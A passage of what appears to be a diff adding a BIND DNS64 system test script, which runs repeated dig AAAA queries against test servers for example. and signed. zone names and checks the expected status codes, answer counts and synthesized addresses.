+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-existent AAAA lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec non-existent.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-excluded AAAA via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-excluded-only.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded AAAA and non-mapped A via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-excluded-bad-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA and mapped A via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-excluded-good-a.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 2," dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking AAAA only via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-aaaa-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A only via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-a-only.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME a-only.example." dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A and AAAA via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-a-and-aaaa.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-mapped A via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-a-not-mapped.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME a-not-mapped.example." dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking NODATA AAAA via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-mx-only.example. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME mx-only.example." dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-existent AAAA via CNAME lookup works, recursive only +norec ($n)"
+ret=0
+$DIG $DIGOPTS +norec cname-non-existent.example.
@10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+# Check the example. domain from non client
+
+echo_i "checking non-excluded AAAA from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS excluded-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded AAAA and non-mapped A from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS excluded-bad-a.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA and mapped A from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS excluded-good-a.example.
@10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking AAAA only from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS aaaa-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A only from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS a-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A and AAAA from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS a-and-aaaa.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-mapped A from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS a-not-mapped.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking NODATA AAAA from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS mx-only.example.
@10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-existent AAAA from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS non-existent.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-excluded AAAA via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-excluded-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded AAAA and non-mapped A via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-excluded-bad-a.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA and mapped A via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-excluded-good-a.example.
@10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking AAAA only via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-aaaa-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A only via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A and AAAA via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-and-aaaa.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-mapped A via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-a-not-mapped.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME a-not-mapped.example."
dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking NODATA AAAA via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-mx-only.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+grep "CNAME mx-only.example." dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-existent AAAA via CNAME from non-client lookup works ($n)"
+ret=0
+$DIG $DIGOPTS cname-non-existent.example. @10.53.0.2 -b 10.53.0.3 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+# Check the signed. domain
+
+echo_i "checking non-excluded AAAA lookup is signed zone works ($n)"
+ret=0
+$DIG $DIGOPTS aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA lookup is signed zone works ($n)"
+ret=0
+$DIG $DIGOPTS excluded-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded AAAA and non-mapped A lookup is signed zone works ($n)"
+ret=0
+$DIG $DIGOPTS excluded-bad-a.signed.
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking excluded only AAAA and mapped A lookup is signed zone works ($n)"
+ret=0
+$DIG $DIGOPTS excluded-good-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:aaaa::102:304" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking AAAA only lookup is signed zone works ($n)"
+ret=0
+$DIG $DIGOPTS aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A only lookup is signed zone works ($n)"
+ret=0
+$DIG $DIGOPTS a-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking A and AAAA lookup is signed zone works ($n)"
+ret=0
+$DIG $DIGOPTS a-and-aaaa.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1
+n=`expr $n + 1`
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking non-mapped A lookup is signed zone works ($n)"
+ret=0
+$DIG $DIGOPTS a-not-mapped.signed.
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS mx-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS non-existent.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-excluded AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-bad-a.signed. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-excluded-good-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:304" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-aaaa-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:aaaa::102:305" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-and-aaaa.signed. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-a-not-mapped.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME a-not-mapped.signed." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-mx-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "CNAME mx-only.signed." dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA via CNAME lookup is signed zone works ($n)" +ret=0 +$DIG $DIGOPTS cname-non-existent.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Check the signed. domain +echo_i "checking non-excluded AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec aaaa-only.signed. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec excluded-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded AAAA and non-mapped A lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec excluded-bad-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking excluded only AAAA and mapped A lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec excluded-good-a.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:eeee::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA only lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec aaaa-only.signed. 
@10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::2" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A only lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec a-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A and AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec a-and-aaaa.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001::1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-mapped A lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec a-not-mapped.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking NODATA AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec mx-only.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking non-existent AAAA lookup is signed zone works with +dnssec ($n)" +ret=0 +$DIG $DIGOPTS +dnssec non-existent.signed. 
